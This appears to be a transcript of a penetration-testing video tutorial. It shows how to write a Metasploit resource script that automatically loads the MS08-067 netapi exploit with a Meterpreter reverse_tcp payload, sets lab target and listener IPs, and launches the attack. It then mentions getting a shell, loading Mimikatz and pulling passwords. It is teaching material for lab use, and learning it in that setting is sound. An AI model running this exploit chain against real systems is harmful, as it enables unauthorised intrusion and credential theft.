Alright, so in this video we're going to go ahead and go into actually writing our own scripts, which is actually going to be extremely easy. At least it should be. So I'm actually where we were when we left off in our last video, so I'm going to exit out of this shell, and I'm going to actually completely exit out of Meterpreter, and let's go ahead and exit out of Metasploit. I've got active sessions open, so I'm going to do an exit -Y. Okay, and now I'm going to go ahead and go back into MSF Console. Another thing that I'm going to do is open up a new terminal, and in this terminal, this is where we're going to write our script. Now remember the MSF4 folder that I talked to you about? Well, we can do a cd/root.msf, and if we hit tab it should automatically find it, which it did. So let's hit enter. I'm going to do an ls. Now we can place our scripts in here, and technically Metasploit has changed, and every time they update something, you know, this may change, but you used to be able to just put your script in this just in the MSF4 directory, and that would load it into Metasploit. You could also you could put your scripts or your modules inside of the modules folder now. But no matter where it's at, if it's in this MS4 directory or if it's in the modules directory, we can still point it towards we can point it at the location, and it should be able to run that. And we're going to go ahead and test that out here in a second. So we've been doing a lot of exploits against, well, the same exploit actually, against my 192.168.1.106. And so every time that we restart Metasploit, I have to re-enter all the exploit information, the payload information, the rhost, lhost, host, ports, and so forth. So it gets tedious, and we do it over and over again, and it gives us good practice. But now I think, since you've done this 1,000 times probably by now, hopefully, then you should be pretty comfortable with it. You should be getting a feel for it. And so now that you've kind of done it the hard way, not even that it's hard, but we can go ahead and just show you a little bit of a tip that will help you if you're going to be exploiting the same systems. And you can use your imagination and how you want to do this. So now that we're in the MSF4 folder, I'm going to take it one step further and go into the modules. So I'm going to do a cd modules, and inside here I'm just going to do an ls. There's nothing in here, and we're going to use that nano command. Now nano is a text editor, but it opens up in memory. So the file doesn't exist, but we can type in the name of the file that we want to use. So really, what do we want to name our script? I can name it, like, let's say, I don't know, quick. You don't want to use any spaces, so use underscores or dashes. And I'm going to just do a quick ms08, and that will tell me that it's the the MS08067 net API, just because as long as I remember what it is, then that's all that matters. And I'm going to put load.rc, because we need everything, all of the scripts and everything that are loaded need to have the .rc. So that's what we're going to put as the extension, and I'm going to hit enter. And now you can see that we're inside this file, quick_ms8 and so forth. Now we can type a bunch of stuff in here, and if we just close out the terminal, it's not going to save it. So if you get to the end and you're done doing what you want to do, make sure that we save it properly, which I'll show you that here in just a second. So really, we're just going to go line by line, exactly the same steps that you would use if you were in Metasploit. Now this is going to be our pre-Meterpreter script. We'll go into the Meterpreter scripts afterwards. So what do we do when we first get in here? Well, if we want to do scans, we can do custom nmap scans. If we have a few different nmap commands that we want to use, we can throw these in here to do that for us. But I'm going to use this, obviously, just a quick load. I want to do a quick load for our exploit and our payload. So what I can do is use exploit Windows SMB MS08. Now you can't use the tab, so you have to remember the paths and everything. So 067 and underscore net API. What's the next thing that we can do? Well, we could set the rhost, but let's go ahead and load set payload Windows Meterpreter reverse underscore TCP. And so now I'm going to set the parameters. So set our host, our remote host, 192.168.1.106. Set L host 192.168.1.101. This is also a nice reason of why you may want to set your static, get yourself a static IP in your Kali Linux machine, so that you remember. And obviously we're in a test environment. In a real scenario, obviously when we go into another network, we need to be assigned an IP address of whatever that network is capable of giving us. So we want to make sure that we're on the same network. But just in our test environment, I'm always 101, and my target that I've been exploiting over and over again has been 106. We've done some other ones, but as long as I know this, then we'll be okay. Now, if you didn't want it to set any of these, then simply just don't put it. Now, this would load up to this point. It would load our exploit, it will load our payload and the parameters. We could put exploit if we want to use the default port, which is on 4444. That's fine. If you want to specify the port, then you'll need to do that. So at this point, we can choose to either exploit or not. So if you think that you may want to change these values, have everything load, but you might want to change values, then just don't use the exploit. But since I know that this is what I want it for, I'm going to add the exploit in there, and that should do all the work for us. So I'm going to go ahead and, to make it more complete, just kind of trying to be thorough, up here we can use a hash symbol or a pound sign, and this should be used for making comments. And so I can just put the name of it, or whatever it wants, so quick ms08 underscore 067 net API load, something like that. It doesn't really matter. You could put your name, you could put an email address, whatever. You can just, the pound symbols or the hash marks are for comments, and Metasploit should ignore that. We'll find that out here in just a second. So Control X, and then it's going to ask if we want to save modified buffer. We want to put a Y for yes, and now it wants to make sure that we have the what file are we writing to, and by default it's going to put whatever we nanoed into, which is quick underscore ms08 underscore load.rc. So I just hit enter, unless you want to name it something else. I just hit enter. Now let's do an ls, and we see there's our script. Now if I do a nano quick, there it is. Everything's saved. So if I do another Control X, it will just exit back out automatically. If we went and made changes to the file, then it would ask us to save it again. But since I just opened it and exited it, it doesn't ask us to, it doesn't ask us for the file name or anything like that. So, all right, we've got our script in there. Now let's go over to Metasploit, and let's go ahead and see if we can load this. So what we're going to do is we're going to do a resource, and we're going to do a -r, and this is used to read or load scripts that aren't currently loaded into Metasploit. Now, it could be already loaded into Metasploit. Usually when you put something in that MSF4 folder, when you start MSF console, it goes through all the folders and it's supposed to load everything. But regardless of if it did or not, we can still use the -r, and that will get us what we want. So it's just one little thing that we do to make sure that it works. And now we need to locate the file. So it's in our /root/.msf4, and we put it in the modules folder. Look at that. I just do modules, hit tab. That's the only thing that I have in there, so it automatically did it for me. All I need to do at this point is just hit enter, and it should execute our script. And it actually gives me a -r is not a valid resource file. Hey, whatever. We'll look at that later on. But as you can see, it went ahead and set our exploit. It set our payload. You can see that over here. Set our payload. It set our R host. It set our L host, and even exploited it for us. and we're sitting at a Meterpreter session. So sweet. Get UID. We can do our process. We can do all kinds of stuff. Load our Mimikatz. Try to do Kerberos. Get our password. Awesome. You know, whatever we need to do. So it worked pretty well. So you don't have to use this to set up your exploits and your payloads. You can use this to do Nmap scans, gather information, whatever it is. You just use your imagination, and the more that you get familiar with Metasploit, you may find many different things to use this. And after this, we're going to go ahead and, in the next video, hopefully talk about Meterpreter, loading things into Meterpreter that we've created. So anyways, hope you enjoyed the video, and I will see you guys in the next one.